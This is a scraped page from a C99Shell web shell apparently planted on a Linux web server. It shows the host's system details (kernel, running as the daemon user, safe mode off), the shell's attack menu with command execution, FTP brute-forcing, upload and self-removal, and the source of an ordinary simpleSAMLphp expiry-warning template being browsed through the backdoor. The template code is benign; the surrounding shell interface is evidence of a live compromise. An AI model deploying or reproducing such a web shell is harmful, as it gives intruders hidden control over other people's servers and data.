!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/modules/expirycheck/templates/   drwxrwxr-x
Free 13.85 GB of 61.93 GB (22.36%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     about2expire.php (3.15 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Template form for giving consent.
 *
 * Parameters:
 * - 'srcMetadata': Metadata/configuration for the source.
 * - 'dstMetadata': Metadata/configuration for the destination.
 * - 'yesTarget': Target URL for the yes-button. This URL will receive a POST request.
 * - 'yesData': Parameters which should be included in the yes-request.
 * - 'noTarget': Target URL for the no-button. This URL will receive a GET request.
 * - 'noData': Parameters which should be included in the no-request.
 * - 'attributes': The attributes which are about to be released.
 * - 'sppp': URL to the privacy policy of the destination, or FALSE.
 *
 * @package simpleSAMLphp
 * @version $Id$
 */


//$this->data['header'] = $this->t('{expirycheck:warning:warning_header}');

# netid will expire today
if ($this->data['daysleft'] == 0) {
    
$this->data['header'] = $this->t('{expirycheck:warning:warning_header_today}', array(
                
'%NETID%' => htmlspecialchars($this->data['netId'])
            ));

    
$warning $this->t('{expirycheck:warning:warning_today}', array(
                
'%NETID%' => htmlspecialchars($this->data['netId'])
            ));

}
# netid will expire in one day
elseif ($this->data['daysleft'] == 1) {

    
$this->data['header'] = $this->t('{expirycheck:warning:warning_header}', array(
                
'%NETID%' => htmlspecialchars($this->data['netId']),
                
'%DAYS%' => $this->t('{expirycheck:warning:day}'),
                
'%DAYSLEFT%' => htmlspecialchars($this->data['daysleft']),
            ));

    
$warning $this->t('{expirycheck:warning:warning}', array(
                
'%NETID%' => htmlspecialchars($this->data['netId']),
                
'%DAYS%' => $this->t('{expirycheck:warning:day}'),
                
'%DAYSLEFT%' => htmlspecialchars($this->data['daysleft']),
            ));

}
# netid will expire in next <daysleft> days
else {
    
$this->data['header'] = $this->t('{expirycheck:warning:warning_header}', array(
                
'%NETID%' => htmlspecialchars($this->data['netId']),
                
'%DAYS%' => $this->t('{expirycheck:warning:days}'),
                
'%DAYSLEFT%' => htmlspecialchars($this->data['daysleft']),
            ));

    
$warning $this->t('{expirycheck:warning:warning}', array(
                
'%NETID%' => htmlspecialchars($this->data['netId']),
                
'%DAYS%' => $this->t('{expirycheck:warning:days}'),
                
'%DAYSLEFT%' => htmlspecialchars($this->data['daysleft']),
            ));


}

//$this->data['header'] = str_replace("%DAYSLEFT%", $this->data['daysleft'], str_replace("%NETID%", $this->data['netId'], $this->t('{expirycheck:warning:warning_header}')));
$this->data['autofocus'] = 'yesbutton';

$this->includeAtTemplateBase('includes/header.php');

?>

<form style="display: inline; margin: 0px; padding: 0px" action="<?php echo htmlspecialchars($this->data['yesTarget']); ?>">

    <?php
        
// Embed hidden fields...
        
foreach ($this->data['yesData'] as $name => $value) {
            echo(
'<input type="hidden" name="' htmlspecialchars($name) . '" value="' htmlspecialchars($value) . '" />');
        }
    
?>
    <h3><?php echo $warning?></h3>
    <p><?php echo $this->t('{expirycheck:warning:expiry_date_text}') . " " $this->data['expireOnDate']; ?></p>

    <input type="submit" name="yes" id="yesbutton" value="<?php echo htmlspecialchars($this->t('{expirycheck:warning:btn_continue}')) ?>" />

</form>


<?php

$this
->includeAtTemplateBase('includes/footer.php');
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4908 ]--